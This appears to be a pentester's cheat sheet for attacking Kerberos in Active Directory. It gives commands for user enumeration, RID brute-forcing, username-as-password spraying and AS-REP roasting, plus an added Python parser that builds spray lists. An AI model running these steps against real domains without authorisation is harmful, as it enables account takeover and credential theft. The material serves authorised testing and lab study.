# Kerberos (88/tcp)

### Kerberos needs the client clock in sync with the KDC

The KDC rejects requests whose timestamp is off by more than the allowed skew (5 minutes by default) with `KRB_AP_ERR_SKEW`, so sync against the DC before anything else:

```
sudo ntpdate $IP
```


### Don't know a username?

Brute-force with kerbrute. It sends AS-REQs without pre-authentication, so guesses do not increment the bad-password count and produce no 4625 logon failures, but a DC with Kerberos auditing enabled still logs a 4768 TGT-request event per attempt:

```
kerbrute userenum --dc $IP -d <domain> /usr/share/wordlist/SecLists/Usernames/xato-net-10-million-usernames.txt
```

Or validate a single username with netexec over Kerberos:

> `-k` needs the domain and the DC hostname to resolve, so register them in /etc/hosts (and keep the clock synced, see above)

```
netexec smb $IP -k -u '<username>' -p ''

# read the KDC error:
# user exists      --> "KDC_ERR_PREAUTH_FAILED"      (wrong password, so the account is real)
# user not exist   --> "KDC_ERR_C_PRINCIPAL_UNKNOWN"
```

### RID Bruteforce

Cycle RIDs via LSA SID lookups to dump every account; this needs any account that can bind, and `guest` with an empty password is often enough:

```
netexec smb $IP -u 'guest' -p '' --rid-brute | tee output.txt

# sort the output: keep SidTypeUser rows, take the DOMAIN\user field, strip the domain,
# dedupe, drop machine accounts (name$) and lowercase everything
grep User output.txt | awk '{print $6}' | awk -F\\ '{print $2}' | sort -u | grep -v '\$$' | tr '[:upper:]' '[:lower:]'
```

### Got a user list from the RID enum?

Spray username-as-password. users.txt must be lowercase because each line is also used as the password; `--no-bruteforce` pairs line N of the user file with line N of the password file instead of trying every combination, and `--continue-on-success` keeps going after a hit. Check the lockout policy first:

```
netexec smb $IP -u users.txt -p users.txt --no-bruteforce --continue-on-success
```
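The awk pipeline in the RID section works, but it truncates names that contain a space and relies on the word "User" appearing in the line. As an added example (not part of the original page), the following Python parses `--rid-brute` output into a deduplicated, lowercase user list, keeping only `SidTypeUser` rows and dropping machine accounts, and writes the `users.txt` used for the spray. The sample output lines are constructed in the netexec layout, not a real capture; the `CORP` domain and the RIDs are invented.

```python
"""Added example (not from the page): turn netexec --rid-brute output into users.txt.
Keeps only SidTypeUser rows, drops machine accounts (name$), lowercases and dedupes,
and survives account names that contain spaces. Sample data below is constructed."""
import re

# Constructed lines in the layout of `netexec smb $IP -u guest -p '' --rid-brute` (not a real capture).
SAMPLE_RID_BRUTE = """\
SMB         10.10.10.1      445    DC01             500: CORP\\Administrator (SidTypeUser)
SMB         10.10.10.1      445    DC01             501: CORP\\Guest (SidTypeUser)
SMB         10.10.10.1      445    DC01             512: CORP\\Domain Admins (SidTypeGroup)
SMB         10.10.10.1      445    DC01             1000: CORP\\DC01$ (SidTypeUser)
SMB         10.10.10.1      445    DC01             1104: CORP\\J.Nakazawa (SidTypeUser)
SMB         10.10.10.1      445    DC01             1105: CORP\\svc_backup (SidTypeUser)
SMB         10.10.10.1      445    DC01             1105: CORP\\svc_backup (SidTypeUser)
"""

# protocol, ip, port, hostname, "RID:", "DOMAIN\name", "(SidType)"; name may contain spaces
RID_LINE = re.compile(
    r"^\S+\s+\S+\s+\d+\s+\S+\s+(?P<rid>\d+):\s+(?P<domain>[^\\]+)\\(?P<name>.+?)\s+\((?P<sidtype>\w+)\)\s*$"
)


def parse_rid_brute(text: str, keep_machine: bool = False) -> dict:
    """Return {lowercase username: rid} for SidTypeUser rows; machine accounts dropped unless asked for."""
    users = {}
    for line in text.splitlines():
        m = RID_LINE.match(line)
        if not m or m["sidtype"] != "SidTypeUser":
            continue  # groups, aliases, unparseable lines
        if m["name"].endswith("$") and not keep_machine:
            continue  # computer account, useless for a user/pass spray
        users[m["name"].lower()] = int(m["rid"])
    return users


def spray_file(users: dict) -> str:
    """Contents for users.txt: one lowercase name per line, sorted, deduplicated."""
    return "\n".join(sorted(users)) + "\n"


if __name__ == "__main__":
    print(spray_file(parse_rid_brute(SAMPLE_RID_BRUTE)), end="")
```

Redirect the script's output to `users.txt` and feed it to the spray command above; pass `keep_machine=True` only if you also want to try machine accounts, whose passwords are random and will not equal the name.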

### Do you have a username?

Collect:

1. Domain
2. Username
3. set domain to /etc/hosts

**GetNPUsers.py** (impacket) requests TGTs for domain users who have "**Do not require Kerberos preauthentication**" set (`UF_DONT_REQUIRE_PREAUTH`), without knowing their passwords. The KDC answers with an AS-REP whose encrypted part is encrypted under the user's key (for RC4, the NT hash), so that blob can be cracked offline to recover the password (AS-REP roasting).

```
GetNPUsers.py -no-pass <domain>/<username>

GetNPUsers.py -no-pass realcorp.htb/j.nakazawa
```

Have many usernames? Pass a file and write hashcat-ready output:

```
GetNPUsers.py test.local/ -dc-ip 10.10.10.1 -usersfile usernames.txt -format hashcat -outputfile hashes.txt
```

![result](https://1855963211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FaDjlLLsWaat1v8p89kgM%2Fuploads%2FL7lLN1ej8YWrO5sF64BU%2Fimage.png?alt=media&token=68f30cfb-516d-434d-bc10-92ac852233ae)

Then crack the hash (hashcat mode 18200 for the `$krb5asrep$23$` format) -> <https://hacker-mind.gitbook.io/hacker-mind/exploit/cracking#kerberost-hash>
